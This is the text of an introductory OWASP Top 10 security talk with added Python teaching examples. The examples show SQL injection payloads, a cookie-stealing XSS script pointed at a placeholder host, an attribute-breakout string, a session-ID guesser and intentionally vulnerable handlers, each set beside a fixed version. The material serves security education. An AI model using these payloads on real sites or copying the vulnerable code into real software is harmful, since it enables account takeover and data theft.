INTRODUCTION TO
SECURITY
VULNERABILITIES
Shirish Padalkar
VodQA, Hyderabad, December 2015
1
ABOUT ME
2
AGENDA
▫︎Some vocabulary
▫︎Introduction to OWASP
▫︎OWASP top 10
▫︎Some demos
▫︎Tools
▫︎References
3
4
VOCABULARY
5
VULNERABILITY
Vulnerability refers to the inability of a
system to withstand the effects of a
hostile environment.
6
In computer security:
A vulnerability is a weakness which
allows an attacker to reduce a system's
information assurance.
7
8
EXPLOIT
Exploit means to take advantage of
something for one's own end, especially
unethically or unjustifiably.
9
An exploit is a piece of software that
takes advantage of a bug or
vulnerability in order to cause
unintended behaviour to occur on
computer software or hardware.
10
OWASP
▫︎Open Web Application Security Project
▫︎Not-for-profit charitable organisation
▫︎Focused on improving the security of software
▫︎All materials are available under a FOSS license
▫︎Currently has over 142 active projects
12
13
https://www.owasp.org
OWASP TOP 10
▫︎List of the 10 most critical web application security risks
▫︎A powerful awareness document
▫︎Reference document for project security analysis
▫︎Published at regular intervals
  ▫︎Approximately once in 3 years
  ▫︎Last published in 2013
14
OWASP TOP 10, 2013
1. Injection
2. Broken authentication and session management
3. Cross-site scripting (XSS)
4. Insecure direct object references
5. Security misconfiguration
6. Sensitive data exposure
7. Missing function level access control
8. Cross-site request forgery (CSRF)
9. Using components with known vulnerabilities
10. Unvalidated redirects and forwards
15
17
INJECTION
INJECTION
▫︎SQL Injection
  ▫︎Most prevalent
  ▫︎Relational databases like Oracle, MySQL
▫︎NoSQL Injection
  ▫︎Comparatively recent
  ▫︎Document databases like MongoDB
▫︎Command Injection
▫︎LDAP Injection
18
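The following is an added example, not code from the talk: a login check against an in-memory SQLite table, first built by string concatenation (the injectable form) and then as a parameterised query. The users table, the two accounts and the two payloads are constructed for the demo; storing clear-text passwords is only to keep the injection point visible.

```python
import sqlite3


# Constructed sample data (not from the slides): an in-memory users table.
# Passwords are kept in clear text only to keep the injection demo short;
# a real application stores salted password hashes.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL by string concatenation, so a quote in the input changes
    the structure of the query. Returns the matched username or None."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver hands the values to the engine as data,
    so a quote or comment marker in the input is just text to compare."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Two classic payloads (constructed for the demo):
#   tautology:  password  ' OR '1'='1   makes the WHERE clause true for every row,
#               so the first account in the table is returned
#   comment:    username  alice'--      comments out the password check entirely
TAUTOLOGY = "' OR '1'='1"
COMMENT_OUT = "alice'--"

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "nobody", TAUTOLOGY))   # alice
    print(login_vulnerable(db, COMMENT_OUT, "wrong"))  # alice
    print(login_safe(db, "nobody", TAUTOLOGY))         # None
    print(login_safe(db, COMMENT_OUT, "wrong"))        # None
```

The tautology works because AND binds tighter than OR, so the concatenated clause parses as (username = 'nobody' AND password = '') OR ('1'='1'); the comment payload works because `--` starts a comment in SQLite, as in most SQL dialects. The same two inputs are harmless against the parameterised version.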
19
DEMO
INJECTION
20
22
BROKEN AUTHENTICATION
BROKEN AUTHENTICATION
▫︎Session ID exposed in the URL, and therefore leaked through the Referer header
  ▫︎PHPSESSID
  ▫︎JSESSIONID
▫︎Passwords stored in clear text or sent over an unencrypted channel
  ▫︎Login over HTTP
  ▫︎Email password in plain text (BSNL?)
▫︎Predictable session IDs
▫︎Reusing the same session ID across login and logout (session fixation, no invalidation)
23
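An added example (not from the talk) for the last two bullets: a deliberately weak session ID generator that an attacker can enumerate, a generator backed by the OS CSPRNG, and a small server-side session store that issues a fresh ID on login and drops it on logout. The weak scheme and its timestamp window are constructed for the demo.

```python
import hashlib
import secrets
import time


def predictable_session_id(counter, now=None):
    """Weak generator (constructed for the demo): MD5 of the login time and a
    per-second counter. Hashing adds no entropy; whoever knows roughly when the
    victim logged in can enumerate every candidate ID."""
    now = int(time.time() if now is None else now)
    return hashlib.md5(f"{now}:{counter}".encode()).hexdigest()


def guess_predictable(target, time_window, max_counter):
    """Recovers (timestamp, counter) for a target ID by brute force over the
    small input space. Returns None if the ID was not built that way."""
    for t in time_window:
        for c in range(max_counter):
            if predictable_session_id(c, t) == target:
                return t, c
    return None


def secure_session_id():
    """256 bits from the OS CSPRNG, URL-safe: not guessable, not enumerable."""
    return secrets.token_urlsafe(32)


class SessionStore:
    """Minimal server-side session table keyed by session ID."""

    def __init__(self):
        self._sessions = {}  # session id -> {"user": name or None}

    def new_anonymous(self):
        sid = secure_session_id()
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, old_sid, user):
        """Issue a fresh ID on authentication. If the pre-login ID was planted
        by an attacker (session fixation) it is now dead and never maps to the
        logged-in user."""
        self._sessions.pop(old_sid, None)
        sid = secure_session_id()
        self._sessions[sid] = {"user": user}
        return sid

    def logout(self, sid):
        """Invalidate server-side so a captured ID cannot be replayed later."""
        self._sessions.pop(sid, None)

    def user_for(self, sid):
        return self._sessions.get(sid, {}).get("user")


if __name__ == "__main__":
    target = predictable_session_id(7, 1449000000)
    print(guess_predictable(target, range(1448999990, 1449000010), 100))  # (1449000000, 7)
    store = SessionStore()
    planted = store.new_anonymous()
    fresh = store.login(planted, "alice")
    print(fresh != planted, store.user_for(planted), store.user_for(fresh))  # True None alice
```

The guessing loop only has to cover a 20-second window and 100 counter values, a few thousand hashes; the point is that a session ID derived from low-entropy inputs stays guessable no matter how it is hashed. The store also shows the rotate-on-login rule that defeats fixation: an attacker who planted `planted` in the victim's browser still holds an ID that maps to nothing after the victim authenticates.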
24
CROSS SITE SCRIPTING
CROSS SITE SCRIPTING (XSS)
▫︎Attacker injects client-side script into pages viewed by other users
▫︎Root cause: user input written into the page with no HTML or JavaScript escaping
▫︎Can steal cookies, change the page location, etc.
▫︎The script runs with the same privileges as the page's origin, so it can read that origin's cookies and DOM
25
XSS TYPES
▫︎Reflected
  ▫︎Non-persistent
  ▫︎The most common type
  ▫︎The payload is typically delivered as a crafted link, via email or a neutral web site
  ▫︎The page echoes part of the request back to the user without properly sanitising it
  ▫︎Example: a search results page that repeats the search term without sanitisation
26
XSS TYPES
▫︎Stored
  ▫︎Persistent
  ▫︎A more devastating variant
  ▫︎The payload is saved server-side and permanently displayed on "normal" pages returned to other users
  ▫︎Example: online message boards / forums, a post on a Facebook wall
27
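An added example, not from the talk, covering both slides: the reflected case is a search page that echoes the query term, once unescaped and once passed through `html.escape` at the output point; the stored case is a tiny message board rendered the same two ways. The cookie-stealing payload, the attribute-breakout payload and the host `evil.example` are constructed placeholders.

```python
import html

# Constructed payloads for the demo; evil.example is a placeholder host.
COOKIE_THEFT = ("<script>document.location='http://evil.example/?c='"
                "+document.cookie</script>")
# Breaks out of a quoted attribute instead of adding a tag.
ATTR_BREAKOUT = '" onfocus="alert(1)" autofocus="'


def search_page_vulnerable(term):
    """Reflected XSS: the search term from the request is echoed into both
    text and attribute context unescaped, so a crafted link runs script in
    the victim's browser."""
    return f'<h1>Results for: {term}</h1>\n<input name="q" value="{term}">'


def search_page_safe(term):
    """Same page with HTML escaping at the output point. quote=True also
    escapes " and ', which is what protects the attribute context."""
    safe = html.escape(term, quote=True)
    return f'<h1>Results for: {safe}</h1>\n<input name="q" value="{safe}">'


class MessageBoard:
    """Stored XSS: posts persist and are rendered to every later visitor."""

    def __init__(self):
        self.posts = []

    def post(self, author, body):
        # Store raw; escaping belongs at the output point, per context.
        self.posts.append((author, body))

    def render_vulnerable(self):
        return "\n".join(f"<li><b>{a}</b>: {b}</li>" for a, b in self.posts)

    def render_safe(self):
        return "\n".join(
            f"<li><b>{html.escape(a)}</b>: {html.escape(b)}</li>"
            for a, b in self.posts
        )


if __name__ == "__main__":
    print(search_page_vulnerable(ATTR_BREAKOUT))
    print(search_page_safe(ATTR_BREAKOUT))
    board = MessageBoard()
    board.post("mallory", COOKIE_THEFT)
    board.post("bob", "hi <3")
    print(board.render_safe())
```

Note that escaping is context-specific: `html.escape` is right for HTML text and quoted attributes, but a value placed inside a `<script>` block, a URL, or CSS needs that context's own encoding. The vulnerable search page shows why the attribute case matters: `ATTR_BREAKOUT` contains no `<` at all, so a filter that only strips tags would pass it.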
28
DEMO
CROSS SITE SCRIPTING (XSS)
29
31
INSECURE DIRECT OBJECT REFERENCES
INSECURE DIRECT OBJECT REFERENCES
▫︎The actual name or key of an object is used when generating web pages
▫︎The application does not verify that the user is authorised for the target object
▫︎Attackers can easily manipulate parameter values to access another object
  ▫︎http://photos.com/download.php?file=personal.jpg
  ▫︎http://mybank.com/accountInfo?accNumber=123456
32
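An added example (not from the talk) built around the `accountInfo?accNumber=123456` URL on the slide: the handler that trusts the parameter, the same handler with an ownership check, and a per-session indirect reference map so the real account number never appears in the page. The account records and session names are constructed for the demo.

```python
import secrets

# Constructed sample data: account number -> record, mirroring the
# accountInfo?accNumber=123456 URL on the slide.
ACCOUNTS = {
    "123456": {"owner": "alice", "balance": 1200},
    "123457": {"owner": "bob", "balance": 80},
}


def account_info_vulnerable(current_user, acc_number):
    """Looks the object up by the caller-supplied key and never asks who owns
    it: bob logs in, edits accNumber to 123456, and reads alice's account."""
    return ACCOUNTS[acc_number]


def account_info_safe(current_user, acc_number):
    """Direct reference kept, but ownership is enforced. A missing account and
    somebody else's account produce the same error, so the attacker cannot
    use the response to enumerate valid keys."""
    acc = ACCOUNTS.get(acc_number)
    if acc is None or acc["owner"] != current_user:
        raise PermissionError("no such account")
    return acc


class IndirectReferenceMap:
    """Per-session indirect references: the page carries an opaque token that
    resolves only for the session that minted it, so the real key is never
    exposed and a token copied from another user's page is useless."""

    def __init__(self):
        self._map = {}  # (session, token) -> real key

    def reference(self, session, real_key):
        token = secrets.token_urlsafe(16)
        self._map[(session, token)] = real_key
        return token

    def resolve(self, session, token):
        return self._map.get((session, token))


def account_info_indirect(refs, session, current_user, token):
    """Resolve the token for this session, then still apply the ownership
    check: indirection hides the key, authorisation is what protects it."""
    key = refs.resolve(session, token)
    if key is None:
        raise PermissionError("no such account")
    return account_info_safe(current_user, key)


if __name__ == "__main__":
    print(account_info_vulnerable("bob", "123456"))  # alice's record, no check
    refs = IndirectReferenceMap()
    token = refs.reference("sess-alice", "123456")
    print(account_info_indirect(refs, "sess-alice", "alice", token))
    print(refs.resolve("sess-bob", token))  # None
```

The map alone is not an authorisation mechanism; `account_info_indirect` still goes through `account_info_safe`, because the ownership check is the control and the indirection only stops the key from being guessable or shareable across sessions.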
33
SECURITY MISCONFIGURATION
SECURITY MISCONFIGURATION
▫︎Running the application with debug mode enabled in production
▫︎Directory listing enabled on the server
▫︎Running outdated software
▫︎Unnecessary services running on the machine
▫︎Not changing default keys and passwords
▫︎Revealing error-handling details, such as stack traces, to attackers
34